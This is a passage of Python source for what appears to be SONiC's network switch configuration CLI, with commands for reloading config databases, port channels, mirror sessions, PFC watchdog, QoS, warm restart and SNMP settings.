<filename> : Names of configuration file(s) to load, separated by comma with no spaces in between
"""
if filename is None:
message = 'Load config from the default config file(s) ?'
else:
message = 'Load config from the file(s) {} ?'.format(filename)
if not yes:
click.confirm(message, abort=True)
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user give the filename[s], extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
# In case of multi-asic mode we have additional config_db{NS}.json files for
# various namespaces created per ASIC. {NS} is the namespace index.
for inst in range(-1, num_cfg_file-1):
#inst = -1, refers to the linux host where there is no namespace.
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
# if any of the config files in linux host OR namespace is not present, return
if not os.path.exists(file):
click.echo("The config_db file {} doesn't exist".format(file))
return
if namespace is None:
command = "{} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, file)
else:
command = "{} -n {} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, namespace, file)
log.log_info("'load' executing...")
clicommon.run_command(command, display_cmd=True)
@config.command()
@click.option('-y', '--yes', is_flag=True)
@click.option('-l', '--load-sysinfo', is_flag=True, help='load system default information (mac, portmap etc) first.')
@click.option('-n', '--no_service_restart', default=False, is_flag=True, help='Do not restart docker services')
@click.argument('filename', required=False)
@clicommon.pass_db
def reload(db, filename, yes, load_sysinfo, no_service_restart):
"""Clear current configuration and import a previous saved config DB dump file.
<filename> : Names of configuration file(s) to load, separated by comma with no spaces in between
"""
if filename is None:
message = 'Clear current config and reload config from the default config file(s) ?'
else:
message = 'Clear current config and reload config from the file(s) {} ?'.format(filename)
if not yes:
click.confirm(message, abort=True)
log.log_info("'reload' executing...")
num_asic = multi_asic.get_num_asics()
cfg_files = []
num_cfg_file = 1
if multi_asic.is_multi_asic():
num_cfg_file += num_asic
# If the user give the filename[s], extract the file names.
if filename is not None:
cfg_files = filename.split(',')
if len(cfg_files) != num_cfg_file:
click.echo("Input {} config file(s) separated by comma for multiple files ".format(num_cfg_file))
return
if load_sysinfo:
command = "{} -j {} -v DEVICE_METADATA.localhost.hwsku".format(SONIC_CFGGEN_PATH, filename)
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
cfg_hwsku, err = proc.communicate()
if err:
click.echo("Could not get the HWSKU from config file, exiting")
sys.exit(1)
else:
cfg_hwsku = cfg_hwsku.strip()
#Stop services before config push
if not no_service_restart:
log.log_info("'reload' stopping services...")
_stop_services(db.cfgdb)
# In Single ASIC platforms we have single DB service. In multi-ASIC platforms we have a global DB
# service running in the host + DB services running in each ASIC namespace created per ASIC.
# In the below logic, we get all namespaces in this platform and add an empty namespace ''
# denoting the current namespace which we are in ( the linux host )
for inst in range(-1, num_cfg_file-1):
# Get the namespace name, for linux host it is None
if inst == -1:
namespace = None
else:
namespace = "{}{}".format(NAMESPACE_PREFIX, inst)
# Get the file from user input, else take the default file /etc/sonic/config_db{NS_id}.json
if cfg_files:
file = cfg_files[inst+1]
else:
if namespace is None:
file = DEFAULT_CONFIG_DB_FILE
else:
file = "/etc/sonic/config_db{}.json".format(inst)
# Check the file exists before proceeding.
if not os.path.exists(file):
click.echo("The config_db file {} doesn't exist".format(file))
continue
if namespace is None:
config_db = ConfigDBConnector()
else:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
client = config_db.get_redis_client(config_db.CONFIG_DB)
client.flushdb()
if load_sysinfo:
if namespace is None:
command = "{} -H -k {} --write-to-db".format(SONIC_CFGGEN_PATH, cfg_hwsku)
else:
command = "{} -H -k {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, cfg_hwsku, namespace)
clicommon.run_command(command, display_cmd=True)
# For the database service running in linux host we use the file user gives as input
# or by default DEFAULT_CONFIG_DB_FILE. In the case of database service running in namespace,
# the default config_db<namespaceID>.json format is used.
if namespace is None:
if os.path.isfile(INIT_CFG_FILE):
command = "{} -j {} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, INIT_CFG_FILE, file)
else:
command = "{} -j {} --write-to-db".format(SONIC_CFGGEN_PATH, file)
else:
if os.path.isfile(INIT_CFG_FILE):
command = "{} -j {} -j {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, INIT_CFG_FILE, file, namespace)
else:
command = "{} -j {} -n {} --write-to-db".format(SONIC_CFGGEN_PATH, file, namespace)
clicommon.run_command(command, display_cmd=True)
client.set(config_db.INIT_INDICATOR, 1)
# Migrate DB contents to latest version
db_migrator='/usr/local/bin/db_migrator.py'
if os.path.isfile(db_migrator) and os.access(db_migrator, os.X_OK):
if namespace is None:
command = "{} -o migrate".format(db_migrator)
else:
command = "{} -o migrate -n {}".format(db_migrator, namespace)
clicommon.run_command(command, display_cmd=True)
# We first run "systemctl reset-failed" to remove the "failed"
# status from all services before we attempt to restart them
if not no_service_restart:
_reset_failed_services(db.cfgdb)
log.log_info("'reload' restarting services...")
_restart_services(db.cfgdb)
@config.command("load_mgmt_config")
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Reload mgmt config?')
@click.argument('filename', default='/etc/sonic/device_desc.xml', type=click.Path(exists=True))
def load_mgmt_config(filename):
"""Reconfigure hostname and mgmt interface based on device description file."""
log.log_info("'load_mgmt_config' executing...")
command = "{} -M {} --write-to-db".format(SONIC_CFGGEN_PATH, filename)
clicommon.run_command(command, display_cmd=True)
#FIXME: After config DB daemon for hostname and mgmt interface is implemented, we'll no longer need to do manual configuration here
config_data = parse_device_desc_xml(filename)
hostname = config_data['DEVICE_METADATA']['localhost']['hostname']
_change_hostname(hostname)
mgmt_conf = netaddr.IPNetwork(config_data['MGMT_INTERFACE'].keys()[0][1])
gw_addr = config_data['MGMT_INTERFACE'].values()[0]['gwaddr']
command = "ifconfig eth0 {} netmask {}".format(str(mgmt_conf.ip), str(mgmt_conf.netmask))
clicommon.run_command(command, display_cmd=True)
command = "ip route add default via {} dev eth0 table default".format(gw_addr)
clicommon.run_command(command, display_cmd=True, ignore_error=True)
command = "ip rule add from {} table default".format(str(mgmt_conf.ip))
clicommon.run_command(command, display_cmd=True, ignore_error=True)
command = "[ -f /var/run/dhclient.eth0.pid ] && kill `cat /var/run/dhclient.eth0.pid` && rm -f /var/run/dhclient.eth0.pid"
clicommon.run_command(command, display_cmd=True, ignore_error=True)
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
@config.command("load_minigraph")
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Reload config from minigraph?')
@click.option('-n', '--no_service_restart', default=False, is_flag=True, help='Do not restart docker services')
@clicommon.pass_db
def load_minigraph(db, no_service_restart):
"""Reconfigure based on minigraph."""
log.log_info("'load_minigraph' executing...")
#Stop services before config push
if not no_service_restart:
log.log_info("'load_minigraph' stopping services...")
_stop_services(db.cfgdb)
# For Single Asic platform the namespace list has the empty string
# for mulit Asic platform the empty string to generate the config
# for host
namespace_list = [DEFAULT_NAMESPACE]
num_npus = multi_asic.get_num_asics()
if num_npus > 1:
namespace_list += multi_asic.get_namespaces_from_linux()
for namespace in namespace_list:
if namespace is DEFAULT_NAMESPACE:
config_db = ConfigDBConnector()
cfggen_namespace_option = " "
ns_cmd_prefix = ""
else:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
cfggen_namespace_option = " -n {}".format(namespace)
ns_cmd_prefix = "sudo ip netns exec {} ".format(namespace)
config_db.connect()
client = config_db.get_redis_client(config_db.CONFIG_DB)
client.flushdb()
if os.path.isfile('/etc/sonic/init_cfg.json'):
command = "{} -H -m -j /etc/sonic/init_cfg.json {} --write-to-db".format(SONIC_CFGGEN_PATH, cfggen_namespace_option)
else:
command = "{} -H -m --write-to-db {}".format(SONIC_CFGGEN_PATH, cfggen_namespace_option)
clicommon.run_command(command, display_cmd=True)
client.set(config_db.INIT_INDICATOR, 1)
# get the device type
device_type = _get_device_type()
if device_type != 'MgmtToRRouter':
clicommon.run_command("pfcwd start_default", display_cmd=True)
# Update SONiC environmnet file
update_sonic_environment()
if os.path.isfile('/etc/sonic/acl.json'):
clicommon.run_command("acl-loader update full /etc/sonic/acl.json", display_cmd=True)
# generate QoS and Buffer configs
clicommon.run_command("config qos reload", display_cmd=True)
# Write latest db version string into db
db_migrator='/usr/local/bin/db_migrator.py'
if os.path.isfile(db_migrator) and os.access(db_migrator, os.X_OK):
for namespace in namespace_list:
if namespace is DEFAULT_NAMESPACE:
cfggen_namespace_option = " "
else:
cfggen_namespace_option = " -n {}".format(namespace)
clicommon.run_command(db_migrator + ' -o set_version' + cfggen_namespace_option)
# We first run "systemctl reset-failed" to remove the "failed"
# status from all services before we attempt to restart them
if not no_service_restart:
_reset_failed_services(db.cfgdb)
#FIXME: After config DB daemon is implemented, we'll no longer need to restart every service.
log.log_info("'load_minigraph' restarting services...")
_restart_services(db.cfgdb)
click.echo("Please note setting loaded from minigraph will be lost after system reboot. To preserve setting, run `config save`.")
#
# 'hostname' command
#
@config.command('hostname')
@click.argument('new_hostname', metavar='<new_hostname>', required=True)
def hostname(new_hostname):
"""Change device hostname without impacting the traffic."""
config_db = ConfigDBConnector()
config_db.connect()
config_db.mod_entry('DEVICE_METADATA' , 'localhost', {"hostname" : new_hostname})
try:
command = "service hostname-config restart"
clicommon.run_command(command, display_cmd=True)
except SystemExit as e:
click.echo("Restarting hostname-config service failed with error {}".format(e))
raise
# Reload Monit configuration to pick up new hostname in case it changed
click.echo("Reloading Monit configuration ...")
clicommon.run_command("sudo monit reload")
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
#
# 'synchronous_mode' command ('config synchronous_mode ...')
#
@config.command('synchronous_mode')
@click.argument('sync_mode', metavar='<enable|disable>', required=True)
def synchronous_mode(sync_mode):
""" Enable or disable synchronous mode between orchagent and syncd \n
swss restart required to apply the configuration \n
Options to restart swss and apply the configuration: \n
1. config save -y \n
config reload -y \n
2. systemctl restart swss
"""
if sync_mode == 'enable' or sync_mode == 'disable':
config_db = ConfigDBConnector()
config_db.connect()
config_db.mod_entry('DEVICE_METADATA' , 'localhost', {"synchronous_mode" : sync_mode})
click.echo("""Wrote %s synchronous mode into CONFIG_DB, swss restart required to apply the configuration: \n
Option 1. config save -y \n
config reload -y \n
Option 2. systemctl restart swss""" % sync_mode)
else:
raise click.BadParameter("Error: Invalid argument %s, expect either enable or disable" % sync_mode)
#
# 'portchannel' group ('config portchannel ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
# TODO add "hidden=True if this is a single ASIC platform, once we have click 7.0 in all branches.
@click.option('-n', '--namespace', help='Namespace name',
required=True if multi_asic.is_multi_asic() else False, type=click.Choice(multi_asic.get_namespace_list()))
@click.pass_context
def portchannel(ctx, namespace):
# Set namespace to default_namespace if it is None.
if namespace is None:
namespace = DEFAULT_NAMESPACE
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=str(namespace))
config_db.connect()
ctx.obj = {'db': config_db, 'namespace': str(namespace)}
@portchannel.command('add')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.option('--min-links', default=0, type=int)
@click.option('--fallback', default='false')
@click.pass_context
def add_portchannel(ctx, portchannel_name, min_links, fallback):
"""Add port channel"""
db = ctx.obj['db']
fvs = {'admin_status': 'up',
'mtu': '9100'}
if min_links != 0:
fvs['min_links'] = str(min_links)
if fallback != 'false':
fvs['fallback'] = 'true'
db.set_entry('PORTCHANNEL', portchannel_name, fvs)
@portchannel.command('del')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.pass_context
def remove_portchannel(ctx, portchannel_name):
"""Remove port channel"""
db = ctx.obj['db']
if len([(k, v) for k, v in db.get_table('PORTCHANNEL_MEMBER') if k == portchannel_name]) != 0:
click.echo("Error: Portchannel {} contains members. Remove members before deleting Portchannel!".format(portchannel_name))
else:
db.set_entry('PORTCHANNEL', portchannel_name, None)
@portchannel.group(cls=clicommon.AbbreviationGroup, name='member')
@click.pass_context
def portchannel_member(ctx):
pass
@portchannel_member.command('add')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.argument('port_name', metavar='<port_name>', required=True)
@click.pass_context
def add_portchannel_member(ctx, portchannel_name, port_name):
"""Add member to port channel"""
db = ctx.obj['db']
if clicommon.is_port_mirror_dst_port(db, port_name):
ctx.fail("{} is configured as mirror destination port".format(port_name))
# Check if the member interface given by user is valid in the namespace.
if interface_name_is_valid(db, port_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
db.set_entry('PORTCHANNEL_MEMBER', (portchannel_name, port_name),
{'NULL': 'NULL'})
@portchannel_member.command('del')
@click.argument('portchannel_name', metavar='<portchannel_name>', required=True)
@click.argument('port_name', metavar='<port_name>', required=True)
@click.pass_context
def del_portchannel_member(ctx, portchannel_name, port_name):
"""Remove member from portchannel"""
db = ctx.obj['db']
# Check if the member interface given by user is valid in the namespace.
if interface_name_is_valid(db, port_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
db.set_entry('PORTCHANNEL_MEMBER', (portchannel_name, port_name), None)
db.set_entry('PORTCHANNEL_MEMBER', portchannel_name + '|' + port_name, None)
#
# 'mirror_session' group ('config mirror_session ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='mirror_session')
def mirror_session():
pass
#
# 'add' subgroup ('config mirror_session add ...')
#
@mirror_session.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('src_ip', metavar='<src_ip>', required=True)
@click.argument('dst_ip', metavar='<dst_ip>', required=True)
@click.argument('dscp', metavar='<dscp>', required=True)
@click.argument('ttl', metavar='<ttl>', required=True)
@click.argument('gre_type', metavar='[gre_type]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.option('--policer')
def add(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer):
""" Add ERSPAN mirror session.(Legacy support) """
add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer)
@mirror_session.group(cls=clicommon.AbbreviationGroup, name='erspan')
@click.pass_context
def erspan(ctx):
""" ERSPAN mirror_session """
pass
#
# 'add' subcommand
#
@erspan.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('src_ip', metavar='<src_ip>', required=True)
@click.argument('dst_ip', metavar='<dst_ip>', required=True)
@click.argument('dscp', metavar='<dscp>', required=True)
@click.argument('ttl', metavar='<ttl>', required=True)
@click.argument('gre_type', metavar='[gre_type]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.argument('src_port', metavar='[src_port]', required=False)
@click.argument('direction', metavar='[direction]', required=False)
@click.option('--policer')
def add(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port, direction):
""" Add ERSPAN mirror session """
add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port, direction)
def gather_session_info(session_info, policer, queue, src_port, direction):
if policer:
session_info['policer'] = policer
if queue:
session_info['queue'] = queue
if src_port:
if clicommon.get_interface_naming_mode() == "alias":
src_port_list = []
for port in src_port.split(","):
src_port_list.append(interface_alias_to_name(None, port))
src_port=",".join(src_port_list)
session_info['src_port'] = src_port
if not direction:
direction = "both"
session_info['direction'] = direction.upper()
return session_info
def add_erspan(session_name, src_ip, dst_ip, dscp, ttl, gre_type, queue, policer, src_port=None, direction=None):
session_info = {
"type" : "ERSPAN",
"src_ip": src_ip,
"dst_ip": dst_ip,
"dscp": dscp,
"ttl": ttl
}
if gre_type:
session_info['gre_type'] = gre_type
session_info = gather_session_info(session_info, policer, queue, src_port, direction)
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
if validate_mirror_session_config(config_db, session_name, None, src_port, direction) is False:
return
config_db.set_entry("MIRROR_SESSION", session_name, session_info)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
if validate_mirror_session_config(per_npu_configdb[front_asic_namespaces], session_name, None, src_port, direction) is False:
return
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, session_info)
@mirror_session.group(cls=clicommon.AbbreviationGroup, name='span')
@click.pass_context
def span(ctx):
""" SPAN mirror session """
pass
@span.command('add')
@click.argument('session_name', metavar='<session_name>', required=True)
@click.argument('dst_port', metavar='<dst_port>', required=True)
@click.argument('src_port', metavar='[src_port]', required=False)
@click.argument('direction', metavar='[direction]', required=False)
@click.argument('queue', metavar='[queue]', required=False)
@click.option('--policer')
def add(session_name, dst_port, src_port, direction, queue, policer):
""" Add SPAN mirror session """
add_span(session_name, dst_port, src_port, direction, queue, policer)
def add_span(session_name, dst_port, src_port, direction, queue, policer):
if clicommon.get_interface_naming_mode() == "alias":
dst_port = interface_alias_to_name(None, dst_port)
if dst_port is None:
click.echo("Error: Destination Interface {} is invalid".format(dst_port))
return
session_info = {
"type" : "SPAN",
"dst_port": dst_port,
}
session_info = gather_session_info(session_info, policer, queue, src_port, direction)
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
if validate_mirror_session_config(config_db, session_name, dst_port, src_port, direction) is False:
return
config_db.set_entry("MIRROR_SESSION", session_name, session_info)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
if validate_mirror_session_config(per_npu_configdb[front_asic_namespaces], session_name, dst_port, src_port, direction) is False:
return
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, session_info)
@mirror_session.command()
@click.argument('session_name', metavar='<session_name>', required=True)
def remove(session_name):
""" Delete mirror session """
"""
For multi-npu platforms we need to program all front asic namespaces
"""
namespaces = multi_asic.get_all_namespaces()
if not namespaces['front_ns']:
config_db = ConfigDBConnector()
config_db.connect()
config_db.set_entry("MIRROR_SESSION", session_name, None)
else:
per_npu_configdb = {}
for front_asic_namespaces in namespaces['front_ns']:
per_npu_configdb[front_asic_namespaces] = ConfigDBConnector(use_unix_socket_path=True, namespace=front_asic_namespaces)
per_npu_configdb[front_asic_namespaces].connect()
per_npu_configdb[front_asic_namespaces].set_entry("MIRROR_SESSION", session_name, None)
#
# 'pfcwd' group ('config pfcwd ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def pfcwd():
"""Configure pfc watchdog """
pass
@pfcwd.command()
@click.option('--action', '-a', type=click.Choice(['drop', 'forward', 'alert']))
@click.option('--restoration-time', '-r', type=click.IntRange(100, 60000))
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('ports', nargs=-1)
@click.argument('detection-time', type=click.IntRange(100, 5000))
def start(action, restoration_time, ports, detection_time, verbose):
"""
Start PFC watchdog on port(s). To config all ports, use all as input.
Example:
config pfcwd start --action drop ports all detection-time 400 --restoration-time 400
"""
cmd = "pfcwd start"
if action:
cmd += " --action {}".format(action)
if ports:
ports = set(ports) - set(['ports', 'detection-time'])
cmd += " ports {}".format(' '.join(ports))
if detection_time:
cmd += " detection-time {}".format(detection_time)
if restoration_time:
cmd += " --restoration-time {}".format(restoration_time)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command()
@click.option('--verbose', is_flag=True, help="Enable verbose output")
def stop(verbose):
""" Stop PFC watchdog """
cmd = "pfcwd stop"
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command()
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('poll_interval', type=click.IntRange(100, 3000))
def interval(poll_interval, verbose):
""" Set PFC watchdog counter polling interval (ms) """
cmd = "pfcwd interval {}".format(poll_interval)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('counter_poll')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('counter_poll', type=click.Choice(['enable', 'disable']))
def counter_poll(counter_poll, verbose):
""" Enable/disable counter polling """
cmd = "pfcwd counter_poll {}".format(counter_poll)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('big_red_switch')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
@click.argument('big_red_switch', type=click.Choice(['enable', 'disable']))
def big_red_switch(big_red_switch, verbose):
""" Enable/disable BIG_RED_SWITCH mode """
cmd = "pfcwd big_red_switch {}".format(big_red_switch)
clicommon.run_command(cmd, display_cmd=verbose)
@pfcwd.command('start_default')
@click.option('--verbose', is_flag=True, help="Enable verbose output")
def start_default(verbose):
""" Start PFC WD by default configurations """
cmd = "pfcwd start_default"
clicommon.run_command(cmd, display_cmd=verbose)
#
# 'qos' group ('config qos ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def qos(ctx):
"""QoS-related configuration tasks"""
pass
@qos.command('clear')
def clear():
"""Clear QoS configuration"""
log.log_info("'qos clear' executing...")
_clear_qos()
@qos.command('reload')
def reload():
"""Reload QoS configuration"""
log.log_info("'qos reload' executing...")
_clear_qos()
_, hwsku_path = device_info.get_paths_to_platform_and_hwsku_dirs()
namespace_list = [DEFAULT_NAMESPACE]
if multi_asic.get_num_asics() > 1:
namespace_list = multi_asic.get_namespaces_from_linux()
for ns in namespace_list:
if ns is DEFAULT_NAMESPACE:
asic_id_suffix = ""
else:
asic_id = multi_asic.get_asic_id_from_name(ns)
if asic_id is None:
click.secho(
"Command 'qos reload' failed with invalid namespace '{}'".
format(ns),
fg="yellow"
)
raise click.Abort()
asic_id_suffix = str(asic_id)
buffer_template_file = os.path.join(hwsku_path, asic_id_suffix, "buffers.json.j2")
if os.path.isfile(buffer_template_file):
qos_template_file = os.path.join(hwsku_path, asic_id_suffix, "qos.json.j2")
if os.path.isfile(qos_template_file):
cmd_ns = "" if ns is DEFAULT_NAMESPACE else "-n {}".format(ns)
sonic_version_file = os.path.join('/', "etc", "sonic", "sonic_version.yml")
command = "{} {} -d -t {},config-db -t {},config-db -y {} --write-to-db".format(
SONIC_CFGGEN_PATH,
cmd_ns,
buffer_template_file,
qos_template_file,
sonic_version_file
)
# Apply the configurations only when both buffer and qos
# configuration files are present
clicommon.run_command(command, display_cmd=True)
else:
click.secho("QoS definition template not found at {}".format(
qos_template_file
), fg="yellow")
else:
click.secho("Buffer definition template not found at {}".format(
buffer_template_file
), fg="yellow")
#
# 'warm_restart' group ('config warm_restart ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='warm_restart')
@click.pass_context
@click.option('-s', '--redis-unix-socket-path', help='unix socket path for redis connection')
def warm_restart(ctx, redis_unix_socket_path):
"""warm_restart-related configuration tasks"""
kwargs = {}
if redis_unix_socket_path:
kwargs['unix_socket_path'] = redis_unix_socket_path
config_db = ConfigDBConnector(**kwargs)
config_db.connect(wait_for_init=False)
# warm restart enable/disable config is put in stateDB, not persistent across cold reboot, not saved to config_DB.json file
state_db = SonicV2Connector(host='127.0.0.1')
state_db.connect(state_db.STATE_DB, False)
TABLE_NAME_SEPARATOR = '|'
prefix = 'WARM_RESTART_ENABLE_TABLE' + TABLE_NAME_SEPARATOR
ctx.obj = {'db': config_db, 'state_db': state_db, 'prefix': prefix}
@warm_restart.command('enable')
@click.argument('module', metavar='<module>', default='system', required=False, type=click.Choice(["system", "swss", "bgp", "teamd"]))
@click.pass_context
def warm_restart_enable(ctx, module):
state_db = ctx.obj['state_db']
prefix = ctx.obj['prefix']
_hash = '{}{}'.format(prefix, module)
state_db.set(state_db.STATE_DB, _hash, 'enable', 'true')
state_db.close(state_db.STATE_DB)
@warm_restart.command('disable')
@click.argument('module', metavar='<module>', default='system', required=False, type=click.Choice(["system", "swss", "bgp", "teamd"]))
@click.pass_context
def warm_restart_enable(ctx, module):
state_db = ctx.obj['state_db']
prefix = ctx.obj['prefix']
_hash = '{}{}'.format(prefix, module)
state_db.set(state_db.STATE_DB, _hash, 'enable', 'false')
state_db.close(state_db.STATE_DB)
@warm_restart.command('neighsyncd_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_neighsyncd_timer(ctx, seconds):
db = ctx.obj['db']
if seconds not in range(1,9999):
ctx.fail("neighsyncd warm restart timer must be in range 1-9999")
db.mod_entry('WARM_RESTART', 'swss', {'neighsyncd_timer': seconds})
@warm_restart.command('bgp_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_bgp_timer(ctx, seconds):
db = ctx.obj['db']
if seconds not in range(1,3600):
ctx.fail("bgp warm restart timer must be in range 1-3600")
db.mod_entry('WARM_RESTART', 'bgp', {'bgp_timer': seconds})
@warm_restart.command('teamsyncd_timer')
@click.argument('seconds', metavar='<seconds>', required=True, type=int)
@click.pass_context
def warm_restart_teamsyncd_timer(ctx, seconds):
db = ctx.obj['db']
if seconds not in range(1,3600):
ctx.fail("teamsyncd warm restart timer must be in range 1-3600")
db.mod_entry('WARM_RESTART', 'teamd', {'teamsyncd_timer': seconds})
@warm_restart.command('bgp_eoiu')
@click.argument('enable', metavar='<enable>', default='true', required=False, type=click.Choice(["true", "false"]))
@click.pass_context
def warm_restart_bgp_eoiu(ctx, enable):
db = ctx.obj['db']
db.mod_entry('WARM_RESTART', 'bgp', {'bgp_eoiu': enable})
def mvrf_restart_services():
"""Restart interfaces-config service and NTP service when mvrf is changed"""
"""
When mvrf is enabled, eth0 should be moved to mvrf; when it is disabled,
move it back to default vrf. Restarting the "interfaces-config" service
will recreate the /etc/network/interfaces file and restart the
"networking" service that takes care of the eth0 movement.
NTP service should also be restarted to rerun the NTP service with or
without "cgexec" accordingly.
"""
cmd="service ntp stop"
os.system (cmd)
cmd="systemctl restart interfaces-config"
os.system (cmd)
cmd="service ntp start"
os.system (cmd)
def vrf_add_management_vrf(config_db):
"""Enable management vrf in config DB"""
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if entry and entry['mgmtVrfEnabled'] == 'true' :
click.echo("ManagementVRF is already Enabled.")
return None
config_db.mod_entry('MGMT_VRF_CONFIG',"vrf_global",{"mgmtVrfEnabled": "true"})
mvrf_restart_services()
def vrf_delete_management_vrf(config_db):
"""Disable management vrf in config DB"""
entry = config_db.get_entry('MGMT_VRF_CONFIG', "vrf_global")
if not entry or entry['mgmtVrfEnabled'] == 'false' :
click.echo("ManagementVRF is already Disabled.")
return None
config_db.mod_entry('MGMT_VRF_CONFIG',"vrf_global",{"mgmtVrfEnabled": "false"})
mvrf_restart_services()
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def snmpagentaddress(ctx):
"""SNMP agent listening IP address, port, vrf configuration"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@snmpagentaddress.command('add')
@click.argument('agentip', metavar='<SNMP AGENT LISTENING IP Address>', required=True)
@click.option('-p', '--port', help="SNMP AGENT LISTENING PORT")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None")
@click.pass_context
def add_snmp_agent_address(ctx, agentip, port, vrf):
"""Add the SNMP agent listening IP:Port%Vrf configuration"""
#Construct SNMP_AGENT_ADDRESS_CONFIG table key in the format ip|<port>|<vrf>
key = agentip+'|'
if port:
key = key+port
key = key+'|'
if vrf:
key = key+vrf
config_db = ctx.obj['db']
config_db.set_entry('SNMP_AGENT_ADDRESS_CONFIG', key, {})
#Restarting the SNMP service will regenerate snmpd.conf and rerun snmpd
cmd="systemctl restart snmp"
os.system (cmd)
@snmpagentaddress.command('del')
@click.argument('agentip', metavar='<SNMP AGENT LISTENING IP Address>', required=True)
@click.option('-p', '--port', help="SNMP AGENT LISTENING PORT")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None")
@click.pass_context
def del_snmp_agent_address(ctx, agentip, port, vrf):
"""Delete the SNMP agent listening IP:Port%Vrf configuration"""
key = agentip+'|'
if port:
key = key+port
key = key+'|'
if vrf:
key = key+vrf
config_db = ctx.obj['db']
config_db.set_entry('SNMP_AGENT_ADDRESS_CONFIG', key, None)
cmd="systemctl restart snmp"
os.system (cmd)
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def snmptrap(ctx):
"""SNMP Trap server configuration to send traps"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@snmptrap.command('modify')
@click.argument('ver', metavar='<SNMP Version>', type=click.Choice(['1', '2', '3']), required=True)
@click.argument('serverip', metavar='<SNMP TRAP SERVER IP Address>', required=True)
@click.option('-p', '--port', help="SNMP Trap Server port, default 162", default="162")
@click.option('-v', '--vrf', help="VRF Name mgmt/DataVrfName/None", default="None")
@click.option('-c', '--comm', help="Community", default="public")
@click.pass_context
def modify_snmptrap_server(ctx, ver, serverip, port, vrf, comm):
"""Modify the SNMP Trap server configuration"""
#SNMP_TRAP_CONFIG for each SNMP version
config_db = ctx.obj['db']
if ver == "1":
#By default, v1TrapDest value in snmp.yml is "NotConfigured". Modify it.
config_db.mod_entry('SNMP_TRAP_CONFIG',"v1TrapDest",{"DestIp": serverip, "DestPort": port, "vrf": vrf, "Community": comm})
elif ver == "2":
